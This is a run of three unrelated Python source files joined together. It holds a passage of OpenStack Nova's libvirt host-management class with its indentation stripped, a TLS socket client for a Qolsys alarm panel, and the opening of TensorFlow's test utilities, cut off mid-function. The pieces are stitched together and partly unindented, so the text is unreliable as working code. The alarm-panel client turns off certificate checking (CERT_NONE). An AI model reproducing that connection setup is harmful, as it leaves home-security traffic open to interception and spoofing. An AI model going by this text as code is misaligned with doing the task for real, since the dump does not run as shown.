# Lets pretend both of these mean success
if ex.get_error_code() in (libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job info: %s", ex)
raise
return cls(
type=info[0],
time_elapsed=info[1],
time_remaining=info[2],
data_total=info[3],
data_processed=info[4],
data_remaining=info[5],
memory_total=info[6],
memory_processed=info[7],
memory_remaining=info[8],
disk_total=info[9],
disk_processed=info[10],
disk_remaining=info[11])
@classmethod
def for_domain(cls, dom):
'''Get job info for the domain
Query the libvirt job info for the domain (ie progress
of migration, or snapshot operation)
Returns: a DomainJobInfo instance
'''
if cls._have_job_stats:
try:
stats = dom.jobStats()
return cls(**stats)
except libvirt.libvirtError as ex:
if ex.get_error_code() == libvirt.VIR_ERR_NO_SUPPORT:
# Remote libvirt doesn't support new API
LOG.debug("Missing remote virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
elif ex.get_error_code() in (
libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
# Transient guest finished migration, so it has gone
# away completely
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job stats: %s", ex)
raise
except AttributeError as ex:
# Local python binding doesn't support new API
LOG.debug("Missing local virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
else:
return cls._get_job_stats_compat(dom)
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._conn_event_handler = conn_event_handler
self._lifecycle_event_handler = lifecycle_event_handler
self._skip_list_all_domains = False
self._caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
if self._conn_event_handler is not None:
self._conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when a event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
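    # How the self-pipe is used (descriptive note, not in the original source):
    # _queue_event() runs in the native libvirt thread and writes one byte to
    # _event_notify_send for every queued event; _dispatch_events() runs in a
    # green thread and blocks on _event_notify_recv.read(1), so that single byte
    # is what wakes it up to drain the queue without polling.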
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
eventlet.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
wrapped_conn = None
try:
wrapped_conn = self._connect(self._uri, self._read_only)
finally:
# Enabling the compute service, in case it was disabled
# since the connection was successful.
disable_reason = None
if not wrapped_conn:
disable_reason = 'Failed to connect to libvirt'
if self._conn_event_handler is not None:
self._conn_event_handler(bool(wrapped_conn), disable_reason)
self._wrapped_conn = wrapped_conn
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_LW("URI %(uri)s does not support events: %(error)s"),
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except (TypeError, AttributeError) as e:
# NOTE: The registerCloseCallback of python-libvirt 1.0.1+
# is defined with 3 arguments, and the above registerClose-
# Callback succeeds. However, the one of python-libvirt 1.0.0
# is defined with 4 arguments and TypeError happens here.
# Then python-libvirt 0.9 does not define a method register-
# CloseCallback.
LOG.debug("The version of python-libvirt does not support "
"registerCloseCallback or is too old: %s", e)
except libvirt.libvirtError as e:
LOG.warn(_LW("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self._uri, 'error': e})
return wrapped_conn
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
wrapped_conn = self._get_new_connection()
return wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_LE("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
rpc.get_notifier('compute').error(nova_context.get_admin_context(),
'compute.libvirt.error',
payload)
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version, utils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
utils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
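    # Hedged usage sketch (version values are illustrative, not from this module):
    #     if host.has_min_version(lv_ver=(1, 0, 4)):
    #         cpus = host.get_online_cpus()
    # has_min_version() passes operator.lt, so it returns False when the running
    # libvirt or hypervisor version is older than the one requested.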
# TODO(sahid): needs to be private
def get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
:param instance: an nova.objects.Instance object
Attempt to lookup the libvirt domain objects
corresponding to the Nova instance, based on
its name. If not found it will raise an
exception.InstanceNotFound exception. On other
errors, it will raise a exception.NovaException
exception.
:returns: a libvirt.Domain object
"""
return self._get_domain_by_name(instance.name)
def get_guest(self, instance):
"""Retrieve libvirt domain object for an instance.
:param instance: an nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
"""
return libvirt_guest.Guest(
self.get_domain(instance))
def _get_domain_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _get_domain_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _list_instance_domains_fast(self, only_running=True):
# The modern (>= 0.9.13) fast way - 1 single API call for all domains
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
return self.get_connection().listAllDomains(flags)
def _list_instance_domains_slow(self, only_running=True):
# The legacy (< 0.9.13) slow way - O(n) API call for n domains
uuids = []
doms = []
# Redundant numOfDomains check is for libvirt bz #836647
if self.get_connection().numOfDomains() > 0:
for id in self.get_connection().listDomainsID():
try:
dom = self._get_domain_by_id(id)
doms.append(dom)
uuids.append(dom.UUIDString())
except exception.InstanceNotFound:
continue
if only_running:
return doms
for name in self.get_connection().listDefinedDomains():
try:
dom = self._get_domain_by_name(name)
if dom.UUIDString() not in uuids:
doms.append(dom)
except exception.InstanceNotFound:
continue
return doms
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
if not self._skip_list_all_domains:
try:
alldoms = self._list_instance_domains_fast(only_running)
except (libvirt.libvirtError, AttributeError) as ex:
LOG.info(_LI("Unable to use bulk domain list APIs, "
"falling back to slow code path: %(ex)s"),
{'ex': ex})
self._skip_list_all_domains = True
if self._skip_list_all_domains:
# Old libvirt, or a libvirt driver which doesn't
# implement the new API
alldoms = self._list_instance_domains_slow(only_running)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
Method is only used by NUMA code paths which check on
libvirt version >= 1.0.4. getCPUMap() was introduced in
libvirt 1.0.0.
:returns: set of online CPUs, raises libvirtError on error
"""
(cpus, cpu_map, online) = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
LOG.info(_LI("Libvirt host capabilities %s"), xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES')
and self._caps.host.cpu.model is not None):
try:
features = self.get_connection().baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
# FIXME(wangpan): the return value of baselineCPU should be
# None or xml string, but libvirt has a bug
# of it from 1.1.2 which is fixed in 1.2.0,
# this -1 checking should be removed later.
if features and features != -1:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warn(_LW("URI %(uri)s does not support full set"
" of host capabilities: %(error)s"),
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error(_LE('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'),
{'old': self._hostname,
'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.NovaException(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
:param usage_id: name of resource in secret
:param password: optional secret value to set
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.NovaException(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s' % xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error defining a secret with XML: %s') % xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
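    # Hedged usage sketch for the secret helpers (identifiers are illustrative only):
    #     secret = host.create_secret('rbd', 'client.cinder secret', password=auth_key)
    #     assert host.find_secret('rbd', 'client.cinder secret') is not None
    #     host.delete_secret('rbd', 'client.cinder secret')
    # where usage_id must match the usage name embedded in the libvirt secret XML.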
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_cpu_count(self):
"""Returns the total numbers of cpu in the host."""
return self._get_hardware_info()[2]
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._get_hardware_info()[1]
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
        if not sys.platform.upper().startswith('LINUX'):
return 0
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
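        # /proc/meminfo is split on whitespace, so each "Label:" token is followed
        # by its value in KiB; idx + 1 therefore points at the number for that label.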
if CONF.libvirt.virt_type == 'xen':
used = 0
for dom in self.list_instance_domains(only_guests=False):
try:
# TODO(sahid): we should have method list_guests()
# which returns Guest's objects
guest = libvirt_guest.Guest(dom)
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info(self)[2])
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
continue
# skip dom0
if dom.ID() != 0:
used += dom_mem
else:
                    # the memory reported for dom0 is greater than what
                    # it is actually using
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used / units.Ki
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self.get_memory_mb_total() - avail / units.Ki
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: a virDomain instance
"""
return self.get_connection().defineXML(xml)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
return self.get_connection().listDevices("pci", flags)
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
|
qolsys_socket.py
|
import json
import socket
import ssl
import sys
import time
import asyncio
import threading
import logging
class qolsys:
################################################################################
# Code
def __init__(self):
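        # These are placeholder values only; the real socket, SSL wrapper, thread
        # and connection parameters are assigned in create_socket().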
self._sock = socket.socket
self._wrappedSocket = ssl.SSLContext.wrap_socket
self._listening_thread = threading.Thread()
self._listener_callback = callable
self._hostname = ""
self._port = 12345
self._token = ""
self._timeout = 60
def create_socket(self, hostname, port, token, cb: callable, timeout=60):
self._hostname = hostname
self._port = port
self._token = token
self._listener_callback = cb
self._timeout = timeout
try:
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(timeout)
            # (The listener callback was stored on the instance above so the
            # listener can be restarted later if the connection drops.)
except socket.error:
logging.error('Could not create a socket')
raise
# Wrap SSL
logging.debug("wrapping socket")
self._wrappedSocket = ssl.wrap_socket(self._sock, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1_2)
# Connect to server
try:
#The stupid Qolsys panel requires blocking
# wrappedSocket.setblocking(False)
logging.debug("connecting to socket")
self._wrappedSocket.connect((hostname, port))
logging.debug(("Connected wrappedSocket:", self._wrappedSocket))
logging.debug("Starting listener thread")
self._start_listener()
#self.listening_thread = threading.Thread(target=self.listen, args=([cb]))
#self.listening_thread.start()
logging.debug("started listener")
return True
except socket.error:
logging.error(("Error creating or connecting to socket", sys.exc_info()))
return False
def _start_listener(self):
logging.debug(("Starting listener thread"))
self._listening_thread = threading.Thread(target=self.listen, args=([self._listener_callback]))
self._listening_thread.start()
logging.debug(("started listener thread"))
def _reset_socket(self):
logging.debug(("Detatching from wrapped socket"))
self._wrappedSocket.detach()
logging.debug(("Closing socket"))
self._sock.close()
time.sleep(2)
#self._listening_thread = threading.Thread(target=self.listen, args=([self._listener_callback]))
logging.debug(("Creating socket"))
self.create_socket(self._hostname, self._port, self._token, self._listener_callback, self._timeout)
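    # The panel appears to expect newline-delimited JSON; send_to_socket() therefore
    # writes a b'\n' before the encoded payload (observed behaviour of this module,
    # not a documented Qolsys requirement).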
    def send_to_socket(self, message: dict):
self._wrappedSocket.send(b'\n')
self._wrappedSocket.send((json.dumps(message)).encode())
return True
def listen(self, cb: callable):
#listening = True
logging.debug("starting listen")
data = ""
#err = ""
while not (self._wrappedSocket._connected):
logging.warning("not connected yet")
logging.debug(self._wrappedSocket._connected)
time.sleep(1)
try:
while self._wrappedSocket._connected:
data = self._wrappedSocket.recv(4096).decode()
if len(data) > 0:
logging.debug(("data received from qolsys panel:", data, "len(data): ", len(data)))
if is_json(data):
try:
cb(data)
                        except Exception:
logging.error(("Error calling callback:", cb, sys.exc_info()))
#print(data)
else:
if data != 'ACK\n':
pass
#logging.warning(("non json data:", data))
else:
logging.error(("No data received. Bad token? Detatching."))
self._wrappedSocket.detach()
raise NoDataError
except socket.timeout:
logging.debug("socket timeout")
except NoDataError:
self._reset_socket()
raise NoDataError
except:
logging.error(("listen failed/stopped:", sys.exc_info()))
def is_json(myjson):
    '''Return True if ``myjson`` parses as non-empty JSON, else False.'''
    try:
        json_object = json.loads(myjson)
        if json_object:
            return True
    except ValueError:
        if myjson != 'ACK\n':
            logging.debug(("not json:", myjson))
            logging.debug(("Error:", sys.exc_info()))
    return False
class NoDataError(Exception):
pass
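# Hedged usage sketch (editor's addition): a minimal, guarded example of how this
# class might be wired up. The hostname, port, token and payload below are
# placeholders, not values from the original module.
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)

    def on_panel_message(raw_json: str):
        # Invoked from the listener thread with each JSON payload from the panel.
        logging.info(("panel message:", raw_json))

    panel = qolsys()
    # create_socket() returns True on success and starts the background listener.
    if panel.create_socket("192.168.1.10", 12345, "PANEL_TOKEN", on_panel_message):
        # Payload format depends on the panel's protocol; this is illustrative only.
        panel.send_to_socket({"action": "INFO", "token": "PANEL_TOKEN"})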
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util.protobuf import compare
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
